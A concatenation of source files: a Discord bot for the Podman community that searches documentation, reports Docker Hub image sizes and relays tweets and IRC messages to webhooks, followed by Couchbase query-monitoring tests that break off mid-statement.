profile=profile,
creds=creds,
region_name=region_name,
with_deps=with_deps,
**kw)
|
index.py
|
import asyncio
import discord
from discord.ext import commands
import aiohttp
from requests_html import AsyncHTMLSession
import nest_asyncio
import json
import socket
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import threading
import requests
try:
import config
except ModuleNotFoundError:
import example_config as config
nest_asyncio.apply()
twitter_id = "1407427126710747142"
sending = False
class PodmanTweetStreamer(StreamListener):
def on_data(self, tweet):
parsed_data = json.loads(tweet)
data = {
"username": "Podman",
"content": "@everyone",
"allowed_mentions": {"parse": ["everyone"]},
"author": {
"name": "Podman",
"icon_url": "https://github.com/containers/podman/\
blob/main/logo/podman-logo.png",
},
"embeds": [
{
"description": f"{parsed_data['text']}",
"title": "Announcement from Podman",
"footer": {"text": f"Posted at {parsed_data['created_at']}"},
}
],
}
requests.post(config.WEBHOOK_URL, json=data)
return True
def on_error(self, status_code):
if status_code == 420:
return False
return super().on_error(status_code)
bot = commands.Bot(
command_prefix=commands.when_mentioned_or(config.PREFIX),
intents=discord.Intents.default(),
help_command=None,
)
@bot.event
async def on_ready():
await bot.change_presence(activity=discord.Game(name="Podman"))
print(f"Logged in as {bot.user.name}")
return
@bot.command()
async def docs(ctx, *args):
"""[Renders the documentaion from docs.podman.io]
Args:
ctx : [context]
"""
if len(args) == 0 or len(args) > 1:
return await ctx.reply("`Invalid Arguments`")
arg = args[0]
query_url = (
f"https://docs.podman.io/en/latest/search.html?q={arg}&check_keywords=yes"
)
try:
session = AsyncHTMLSession()
response = await session.get(query_url)
except Exception:
return await ctx.send("`Failed to Establish Connection. Try again Later!`")
else:
await response.html.arender(sleep=2)
await session.close()
about = response.html.find(".search", first=True)
a = about.find("li")
pages = len(a)
title, res = "", []
print(a[0])
if not pages:
title = "`No Results Found`"
else:
title = f"`Results for: {arg}`"
for i in range(pages):
desc = f'[`{a[i].text}`]({str(list(a[i].find("a")[0].absolute_links)[0])})'
embed = discord.Embed(title=title, description=desc, color=0xE8E3E3)
res.append(embed)
cur_page = 0
reply_embed = await ctx.reply(embed=res[cur_page], mention_author=False)
await reply_embed.add_reaction("◀️")
await reply_embed.add_reaction("▶️")
await reply_embed.add_reaction("\U0001F5D1")
while True:
try:
reaction, user = await bot.wait_for(
"reaction_add",
check=lambda reaction, user: user == ctx.author
and str(reaction.emoji) in ["◀️", "▶️", "\U0001F5D1"],
timeout=60,
)
if str(reaction.emoji) == "▶️" and cur_page != pages:
cur_page += 1
await reply_embed.edit(embed=res[cur_page])
await reply_embed.remove_reaction(reaction, ctx.author)
elif str(reaction.emoji) == "◀️" and cur_page > 0:
cur_page -= 1
await reply_embed.edit(embed=res[cur_page])
await reply_embed.remove_reaction(reaction, ctx.author)
elif str(reaction.emoji) == "\U0001F5D1":
await reply_embed.delete()
else:
await reply_embed.remove_reaction(reaction, ctx.author)
except asyncio.TimeoutError:
await reply_embed.clear_reactions()
@bot.command()
async def inspect(ctx, *args):
"""[Fetch data from Docker Hub API, this is used to inspect the size of images]
Args:
ctx : [context]
"""
name = args[0]
async with aiohttp.ClientSession() as session:
async with session.get(
f"https://hub.docker.com/v2/repositories/library/{name}/tags"
) as response:
if response.status != 200:
return await ctx.reply("`Falied to fetch data | Try again later`")
data = await response.text()
json_data = json.loads(str(data))
res = []
for result in json_data["results"][:10]:
res.append(
f"`{name}:{result['name']} => {round(result['full_size']/(1048576),2)} MB`"
)
res[0] += "•"
embed = discord.Embed(
title=f"`Results for {name}`",
description="\n•".join(res),
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
# TODO: Do not hardcode the links
@bot.command()
async def links(ctx, *args):
"""[Render important links]
Args:
ctx, *args: [context and tuple arguments]
"""
if len(args) == 1:
if args[0] in ("tshoot", "trouble", "troubleshoot", "ts"):
embed = discord.Embed(
title="Troubleshooting Reference",
description="https://github.com/containers/podman/blob/main/troubleshooting.md",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] in ("git", "github"):
embed = discord.Embed(
title="GitHub",
description="https://github.com/containers/podman",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] in ("website", "webpage", "web"):
embed = discord.Embed(
title="Official Website",
description="https://podman.io/",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] == "issues":
embed = discord.Embed(
title="GitHub Issues",
description="https://github.com/containers/podman/issues",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
elif args[0] in ("prs", "PRS", "PRs", "PR", "pulls"):
embed = discord.Embed(
title="GitHub Pull Requests",
description="https://github.com/containers/podman/pulls",
color=0xE8E3E3,
)
return await ctx.send(embed=embed)
else:
return await ctx.reply("`Invalid Arguments`")
def establish_twitter_connection():
global twitter_id
listener = PodmanTweetStreamer()
auth = OAuthHandler(config.API_TOKEN, config.API_TOKEN_SECRET)
auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)
stream = Stream(auth, listener)
stream.filter(follow=[twitter_id])
def establish_irc_connection():
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ircsock.connect((config.SERVER, 6667))
ircsock.send(
bytes(
"USER "
+ config.NICK
+ " "
+ config.NICK
+ " "
+ config.NICK
+ " "
+ config.NICK
+ "\n",
encoding="utf8",
)
)
ircsock.send(bytes("NICK " + config.NICK + "\n", encoding="utf8"))
ircsock.send(bytes("JOIN " + config.CHANNEL + "\n", encoding="utf8"))
global sending
while True:
ircmsg = ircsock.recv(2048)
if b"/NAMES" in ircmsg:
sending = True
continue
if b"PING" in ircmsg:
ircsock.send(bytes("PONG :pong", encoding="utf8"))
continue
if b"JOIN" in ircmsg or b"QUIT" in ircmsg:
continue
if sending:
data = {"content": ircmsg.decode("utf-8")}
requests.post(config.IRC_WEBHOOK_URL, json=data)
print(ircmsg)
if __name__ == "__main__":
twitter_conn = threading.Thread(target=establish_twitter_connection)
twitter_conn.start()
irc_conn = threading.Thread(target=establish_irc_connection)
irc_conn.start()
bot.run(config.TOKEN, bot=True, reconnect=True)
twitter_conn.join()
irc_conn.join()
|
tuq_monitoring.py
|
import json
import logging
import threading
import time
from remote.remote_util import RemoteMachineShellConnection
from .tuq import QueryTests
class QueryMonitoringTests(QueryTests):
def setUp(self):
super(QueryMonitoringTests, self).setUp()
self.threadFailure = False
self.run_cbq_query('delete from system:completed_requests')
self.run_cbq_query('delete from system:prepareds')
self.rest.set_completed_requests_collection_duration(self.master, 1000)
self.rest.set_completed_requests_max_entries(self.master, 4000)
self.query_buckets = self.get_query_buckets(check_all_buckets=True)
def suite_setUp(self):
super(QueryMonitoringTests, self).suite_setUp()
def tearDown(self):
super(QueryMonitoringTests, self).tearDown()
def suite_tearDown(self):
super(QueryMonitoringTests, self).suite_tearDown()
##############################################################################################
#
# Monitoring Test Cases (Normal Queries)
#
##############################################################################################
'''Runs the basic cluster monitoring checks: (2 queries will be run when calling this method, each query will be
called from a different node)
-check if the running queries are in system:active_requests
-check if the queries' node fields accurately reflect the node they were started from
-check if a query can be accessed from system:active_requests using its requestId
-check if a query can be killed from system:active_requests using its requestId
-once the query is killed check if it is in system:completed_requests
-check if the queries appear in system:completed_requests when they complete.'''
def test_simple_cluster_monitoring(self):
self.test_monitoring(test='simple')
'''Runs basic completed_requests deletions
-check if you can delete the whole log
-check if you can delete by node
-check if you can delete by requestId'''
def test_purge_completed(self):
self.test_monitoring(test='purge')
'''Checks to see if active_requests and completed_requests can be filtered by node'''
def test_filter_by_node(self):
self.test_monitoring(test='filter')
'''Checks to see if the queries run from a server that has been downed are removed from system:completed_requests'''
def test_server_failure(self):
self.test_monitoring(test='simple')
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 3)
remote = RemoteMachineShellConnection(self.servers[1])
remote.stop_server()
time.sleep(30)
# Check to see that completed_requests does not contain info from the downed node
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
result = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
self.assertEqual(result['metrics']['resultCount'], 0)
# The info from the down node should not have been restored by the node coming back online
remote.start_server()
time.sleep(30)
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
result = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
self.assertEqual(result['metrics']['resultCount'], 0)
##############################################################################################
#
# Monitoring Helper Functions
#
##############################################################################################
def run_parallel_query(self, server):
logging.info('parallel query is active')
query = "(select * from " + self.query_buckets[0] + ") union (select d from " + self.query_buckets[
0] + " d JOIN " + self.query_buckets[0] + " def ON KEYS d.name) union (select * from " + self.query_buckets[
0] + ")"
self.run_cbq_query(query, server=server)
'''Run basic cluster monitoring checks (outlined in the helper function) by executing 2 queries in parallel, must be
run with a sufficient number of docs to be an effective test (docs-per-day >=3).'''
def test_monitoring(self, test):
for query_bucket in self.query_buckets:
logging.info('PURGING COMPLETED REQUEST LOG')
self.run_cbq_query('delete from system:completed_requests')
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 0)
logging.info("CHECKING THAT NO REQUESTS ARE RUNNING")
result = self.run_cbq_query('select * from system:active_requests')
self.assertEqual(result['metrics']['resultCount'], 1)
e = threading.Event()
if test == 'simple':
t50 = threading.Thread(name='run_simple_monitoring', target=self.run_simple_monitoring_check,
args=(e, 2))
elif test == 'purge':
t50 = threading.Thread(name='run_purge', target=self.run_purge_completed_requests,
args=(e, 2))
elif test == 'filter':
t50 = threading.Thread(name='run_filter_by_node', target=self.run_filter_by_node,
args=(e, 2))
t52 = threading.Thread(name='run_third_query', target=self.run_parallel_query,
args=[self.servers[1]])
t53 = threading.Thread(name='run_fourth_query', target=self.run_parallel_query,
args=[self.servers[1]])
else:
raise Exception("Incorrect test provided")
t51 = threading.Thread(name='run_second_query', target=self.run_parallel_query,
args=[self.servers[2]])
t50.start()
t51.start()
if test == 'filter':
t52.start()
t53.start()
e.set()
query = '(select * from %s ) union (select * from %s )' % (query_bucket, query_bucket)
self.run_cbq_query(query, server=self.servers[1])
logging.debug('event is set')
t50.join(100)
t51.join(100)
if test == 'filter':
t52.join(100)
t53.join(100)
self.assertFalse(self.threadFailure)
query_template = 'FROM %s select $str0, $str1 ORDER BY $str0,$str1 ASC' % query_bucket
actual_result, expected_result = self.run_query_from_template(query_template)
self._verify_results(actual_result['results'], expected_result)
def run_simple_monitoring_check(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(5)
# check if the running queries are in system:active_requests
logging.info('CHECKING SYSTEM:ACTIVE_REQUESTS FOR THE RUNNING QUERIES')
result = self.run_cbq_query('select * from system:active_requests')
if not result['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error(
'NOT ALL ACTIVE QUERIES ARE IN ACTIVE_REQUESTS, THERE SHOULD BE 3 QUERIES ACTIVE. %s'
' QUERIES ARE ACTIVE.' % result['metrics']['resultCount'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the queries' node fields accurately reflect the node they were started from
logging.info("VERIFYING THAT ACTIVE_REQUESTS HAVE THE QUERIES MARKED WITH THE CORRECT NODES")
node1 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not node1['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY ON THE REQUESTED NODE: "%s:%s" IS NOT IN SYSTEM:ACTIVE_REQUESTS'
% (self.servers[1].ip, self.servers[1].port))
self.log.error(node1)
return
node2 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[2].ip, self.servers[2].port))
if not node2['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY ON THE REQUESTED NODE: "%s:%s" IS NOT IN SYSTEM:ACTIVE_REQUESTS'
% (self.servers[2].ip, self.servers[2].port))
self.log.error(node2)
return
# check if a query can be accessed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE ACCESSED VIA ITS requestId")
requestId = result['results'][1]['active_requests']['requestId']
result = self.run_cbq_query('select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" IS NOT IN ACTIVE_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if a query can be killed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE KILLED")
time.sleep(1)
self.run_cbq_query('delete from system:active_requests where requestId = "%s"' % requestId)
result = self.run_cbq_query('select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" WAS NOT KILLED AND IS STILL IN ACTIVE_REQUESTS'
% requestId)
return
# once the query is killed check if it is in system:completed_requests
result = self.run_cbq_query('select * from system:completed_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" WAS REMOVED FROM ACTIVE_REQUESTS BUT NOT PUT INTO '
'COMPLETED_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
time.sleep(60)
# check if the queries appear in system:completed_requests when they complete.
logging.info('CHECKING IF ALL COMPLETED QUERIES ARE IN SYSTEM:COMPLETED_REQUESTS')
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error('THE QUERIES EITHER DID NOT COMPLETE RUNNING OR WERE NOT ADDED TO '
'SYSTEM:COMPLETED_REQUESTS')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
def run_purge_completed_requests(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(60)
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS HAS QUERIES IN IT')
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error('THERE ARE NO ITEMS INSIDE SYSTEM:COMPLETED_REQUESTS')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the queries appear in system:completed_requests when they complete.
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS CAN BE PURGED')
self.run_cbq_query("delete from system:completed_requests")
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error('DELETE FAILED, THERE ARE STILL ITEMS INSIDE SYSTEM:COMPLETED_REQUESTS')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
query1 = threading.Thread(name='run_first_query', target=self.run_parallel_query,
args=[self.servers[1]])
query2 = threading.Thread(name='run_first_query', target=self.run_parallel_query,
args=[self.servers[1]])
query3 = threading.Thread(name='run_third_query', target=self.run_parallel_query,
args=[self.servers[2]])
query4 = threading.Thread(name='run_fourth_query', target=self.run_parallel_query,
args=[self.servers[2]])
query1.start()
query2.start()
query3.start()
query4.start()
query1.join(100)
query2.join(100)
query3.join(100)
query4.join(100)
# check if the queries can be purged selectively
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS CAN BE PURGED BY NODE')
self.run_cbq_query('delete from system:completed_requests where node = "%s:%s"'
% (self.servers[2].ip, self.servers[2].port))
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error('DELETE FAILED, THERE ARE STILL ITEMS FROM NODE: "%s:%s"'
'INSIDE SYSTEM:COMPLETED_REQUESTS'
% (self.servers[2].ip, self.servers[2].port))
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the queries can be purged by requestId
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS CAN BE PURGED BY REQUESTID')
requestId = result['results'][0]['completed_requests']['requestId']
self.run_cbq_query('delete from system:completed_requests where requestId = "%s"' % requestId)
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('DELETE FAILED, THE QUERY FOR REQUESTID: "%s" IS STILL '
'INSIDE SYSTEM:COMPLETED_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
def run_filter_by_node(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(3)
logging.info('CHECKING IF SYSTEM:ACTIVE_REQUESTS RESULTS CAN BE FILTERED BY NODE')
result = self.run_cbq_query('select * from system:active_requests')
node1 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[2].ip, self.servers[2].port))
if not node1['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INCORRECT')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node1)
return
node2 = self.run_cbq_query('select * from system:active_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not node2['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INCORRECT')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node2)
return
time.sleep(90)
logging.info('CHECKING IF SYSTEM:COMPLETED_REQUESTS RESULTS CAN BE FILTERED BY NODE')
result = self.run_cbq_query('select * from system:completed_requests')
node1 = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
% (self.servers[2].ip, self.servers[1].port))
if not node1['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INACCURATE')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node1)
return
node2 = self.run_cbq_query('select * from system:completed_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not node2['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error('THE RESULTS OF THE QUERY ARE INACCURATE')
self.log.error(json.dumps(result, sort_keys=True, indent=3))
self.log.error(node2)
return
##############################################################################################
#
# Monitoring Prepared Test Cases
#
##############################################################################################
'''Runs the basic prepared monitoring checks:
-Check that the number of uses for a prepared statement is correctly updated
-Check that prepared statements appear in system:active_requests when ran
-Check that prepared statements appear in system:completed_requests when ran.'''
def test_prepared_monitoring(self):
self.test_prepared_common_body()
time.sleep(10)
# Check that both prepareds are in system:prepareds
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
name = result['results'][1]['prepareds']['name']
uses = result['results'][1]['prepareds']['uses']
self.assertEqual(uses, 1)
secondname = result['results'][1]['prepareds']['name']
e = threading.Event()
thread1 = threading.Thread(name='run_simple_monitoring', target=self.run_simple_monitoring_prepared_check,
args=(e, 2))
thread2 = threading.Thread(name='run_prepared', target=self.execute_prepared, args=(name, self.servers[0]))
thread3 = threading.Thread(name='run_prepared', target=self.execute_prepared,
args=(secondname, self.servers[1]))
thread1.start()
thread2.start()
thread3.start()
e.set()
thread1.join(100)
thread2.join(100)
thread3.join(100)
self.assertFalse(self.threadFailure)
'''Runs the basic prepared deletion checks:
-Check if system:prepareds can be purged completely
-Check if system:prepareds can be purged by node
-Check if system:prepareds can be purged by preparedName.'''
def test_prepared_deletion(self):
self.test_prepared_common_body()
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
# Check if you can delete everything in system:prepareds
self.run_cbq_query("delete from system:prepareds")
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 0)
# Reset prepared statements for next deletion check
self.test_prepared_common_body()
# Check if you can delete from system:prepareds by node
self.query = "delete from system:prepareds where node = '%s:%s'" \
% (self.servers[0].ip, self.servers[0].port)
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 4)
self.query = "delete from system:prepareds where node = '%s:%s'" \
% (self.servers[1].ip, self.servers[1].port)
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 2)
self.query = "delete from system:prepareds where node = '%s:%s'" \
% (self.servers[2].ip, self.servers[2].port)
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 0)
# Reset prepared statements for next deletion check
self.test_prepared_common_body()
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
prepared1 = result['results'][0]['prepareds']['name']
prepared2 = result['results'][1]['prepareds']['name']
# Check if system:prepareds can be deleted from by prepared name
self.query = "delete from system:prepareds where name = '%s'" % prepared1
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 3)
self.query = "delete from system:prepareds where name = '%s'" % prepared2
self.run_cbq_query()
result = self.run_cbq_query("select * from system:prepareds")
self.assertEqual(result['metrics']['resultCount'], 0)
'''Runs the basic prepared filtering checks:
-Check if system:prepareds can be filtered by prepared statement name
-Check if system:prepareds can be purged by node.'''
def test_prepared_filtering(self):
self.test_prepared_common_body()
# Check that both prepareds are in system:prepareds
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
prepared1 = result['results'][0]['prepareds']['name']
prepared2 = result['results'][1]['prepareds']['name']
# Check if you can access prepared statements from system:prepareds by the prepared statement's name
self.query = "select * from system:prepareds where name = '%s'" % prepared1
name1 = self.run_cbq_query(server=self.servers[2])
self.assertEqual(name1['metrics']['resultCount'], 3)
# Check if you can access prepared statements from system:prepareds by the prepared statement's name
self.query = "select * from system:prepareds where name = '%s'" % prepared2
name2 = self.run_cbq_query(server=self.servers[2])
self.assertEqual(name2['metrics']['resultCount'], 3)
# Check to see if system:prepareds can be filtered by node
self.query = "select * from system:prepareds where node = '%s:%s'" % \
(self.servers[0].ip, self.servers[0].port)
node1 = self.run_cbq_query()
self.assertEqual(node1['metrics']['resultCount'], 2)
# Check to see if system:prepareds can be filtered by node
self.query = "select * from system:prepareds where node = '%s:%s'" \
% (self.servers[1].ip, self.servers[1].port)
node2 = self.run_cbq_query()
self.assertEqual(node2['metrics']['resultCount'], 2)
# Check to see if system:prepareds can be filtered by node
self.query = "select * from system:prepareds where node = '%s:%s'" \
% (self.servers[2].ip, self.servers[2].port)
node3 = self.run_cbq_query()
self.assertEqual(node3['metrics']['resultCount'], 2)
def test_prepared_check_requestId(self):
self.test_prepared_kill(self.run_check_requestId)
def test_prepared_kill_by_requestId(self):
self.test_prepared_kill(self.run_kill_prepared_by_requestId)
def test_prepared_kill_by_name(self):
self.test_prepared_kill(self.run_kill_prepared_by_name)
def test_prepared_kill_by_node(self):
self.test_prepared_kill(self.run_kill_prepared_by_node)
##############################################################################################
#
# Prepared Test Helper Functions
#
##############################################################################################
def execute_prepared(self, prepared_name, server):
result = self.run_cbq_query('EXECUTE "%s"' % prepared_name, server=server)
'''Prepares two statements on different nodes.'''
def test_prepared_common_body(self, test_type=None):
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 0)
self.query = "(select * from " + self.query_buckets[0] + " union select * from " + self.query_buckets[
0] + " union select * from " + self.query_buckets[0] + ") " \
"union (select d from " + self.query_buckets[
0] + " d JOIN " + self.query_buckets[0] + " def ON KEYS d.name)"
self.prepared_common_body()
self.prepared_common_body(server=self.servers[1])
def run_simple_monitoring_prepared_check(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
logging.info('CHECKING # OF USES FOR THE PREPARED STATEMENT ON NODE "%s"' % self.servers[0])
result = self.run_cbq_query('select * from system:prepareds')
if not result['results'][0]['prepareds']['uses'] == 2:
self.threadFailure = True
logging.error(
'THE PREPARED STATEMENT SHOULD HAVE 2 USES, BUT ONLY "%s" USES HAVE BEEN REPORTED'
% result['results'][0]['prepareds']['uses'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
# check if the running queries are in system:active_requests
logging.info('CHECKING SYSTEM:ACTIVE_REQUESTS FOR THE RUNNING QUERIES')
result = self.run_cbq_query('select * from system:active_requests')
if not result['metrics']['resultCount'] == 3:
self.threadFailure = True
logging.error(
'NOT ALL ACTIVE QUERIES ARE IN ACTIVE_REQUESTS, THERE SHOULD BE 2 QUERIES ACTIVE. %s'
' QUERIES ARE ACTIVE.' % result['metrics']['resultCount'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
time.sleep(30)
# Check if the completed query is in system:completed_requests
logging.info('CHECKING SYSTEM:COMPLETED_REQUESTS FOR THE COMPLETED QUERIES')
result = self.run_cbq_query('select * from system:completed_requests')
if not result['metrics']['resultCount'] == 6:
self.threadFailure = True
logging.error(
'COMPLETED REQUESTS IS DIFFERENT THAN WHAT IS EXPECTED, THERE SHOULD BE 4 QUERIES COMPLETED. %s'
' QUERIES ARE COMPLETED.' % result['metrics']['resultCount'])
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Checks if a prepared request can be killed from system:active_requests:
-Check if the request can be killed by its requestId
-Check if the request can be killed by its name.
-Check if requests can be killed by node.'''
def test_prepared_kill(self, test_to_run):
self.test_prepared_common_body("kill")
# Check that both prepareds are in system:prepareds
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertEqual(result['metrics']['resultCount'], 6)
name = result['results'][0]['prepareds']['name']
secondname = result['results'][1]['prepareds']['name']
e = threading.Event()
thread1 = threading.Thread(name='run_prepared_test', target=test_to_run,
args=(e, 2))
thread2 = threading.Thread(name='run_prepared', target=self.execute_prepared, args=(name, self.servers[0]))
thread3 = threading.Thread(name='run_prepared', target=self.execute_prepared,
args=(secondname, self.servers[1]))
thread1.start()
thread2.start()
thread3.start()
e.set()
thread1.join(100)
thread2.join(100)
thread3.join(100)
self.assertFalse(self.threadFailure)
'''Helper to check if a prepared statement can be accessed by its requestId'''
def run_check_requestId(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
time.sleep(1)
result = self.run_cbq_query('select * from system:active_requests')
# check if a query can be accessed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE ACCESSED VIA ITS requestId")
requestId = result['results'][2]['active_requests']['requestId']
result = self.run_cbq_query('select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 1:
self.threadFailure = True
logging.error('THE QUERY FOR requestId "%s" IS NOT IN ACTIVE_REQUESTS' % requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Helper to check if a prepared statement can be killed by its requestId'''
def run_kill_prepared_by_requestId(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
result = self.run_cbq_query('select * from system:active_requests')
requestId = result['results'][0]['active_requests']['requestId']
# check if a query can be killed from system:active_requests using its requestId
logging.info("CHECKING IF A QUERY CAN BE KILLED BY REQUESTID")
self.run_cbq_query(
'delete from system:active_requests where requestId = "%s"' % requestId)
result = self.run_cbq_query(
'select * from system:active_requests where requestId = "%s"'
% requestId)
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error(
'THE QUERY FOR requestId "%s" WAS NOT KILLED AND IS STILL IN ACTIVE_REQUESTS'
% requestId)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Helper to check if a prepared statement can be killed by its preparedName'''
def run_kill_prepared_by_name(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
result = self.run_cbq_query('select * from system:active_requests')
# Check if a request can be killed by query name
logging.info("CHECKING IF A QUERY CAN BE KILLED BY NAME")
preparedName = result['results'][2]['active_requests']['preparedName']
self.run_cbq_query(
'delete from system:active_requests where preparedName = "%s"' % preparedName)
result = self.run_cbq_query(
'select * from system:active_requests where preparedName = "%s"'
% preparedName)
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error(
'THE QUERY FOR name "%s" WAS NOT KILLED AND IS STILL IN ACTIVE_REQUESTS'
% preparedName)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
'''Helper to check if a prepared statement/multiple prepared statements can be killed by node'''
def run_kill_prepared_by_node(self, e, t):
while not e.isSet():
logging.debug('wait_for_event_timeout starting')
event_is_set = e.wait(t)
logging.debug('event set: %s', event_is_set)
if event_is_set:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
name = result['results'][0]['prepareds']['name']
secondname = result['results'][1]['prepareds']['name']
thread1 = threading.Thread(name='run_prepared',
target=self.execute_prepared,
args=(name, self.servers[0]))
thread2 = threading.Thread(name='run_prepared',
target=self.execute_prepared,
args=(name, self.servers[0]))
thread3 = threading.Thread(name='run_prepared',
target=self.execute_prepared,
args=(secondname, self.servers[1]))
thread1.start()
thread2.start()
thread3.start()
# Check if a request can be killed by query node
logging.info("CHECKING IF A QUERY CAN BE KILLED BY NODE")
time.sleep(0.3)
self.run_cbq_query(
'delete from system:active_requests where node = "%s:%s"'
% (self.servers[0].ip, self.servers[0].port))
result = self.run_cbq_query(
'select * from system:active_requests where node = "%s:%s"'
% (self.servers[0].ip, self.servers[0].port), server=self.servers[1])
if not result['metrics']['resultCount'] == 0:
self.threadFailure = True
logging.error('THE QUERIES FOR node "%s" WERE NOT KILLED AND ARE STILL IN ACTIVE_REQUESTS'
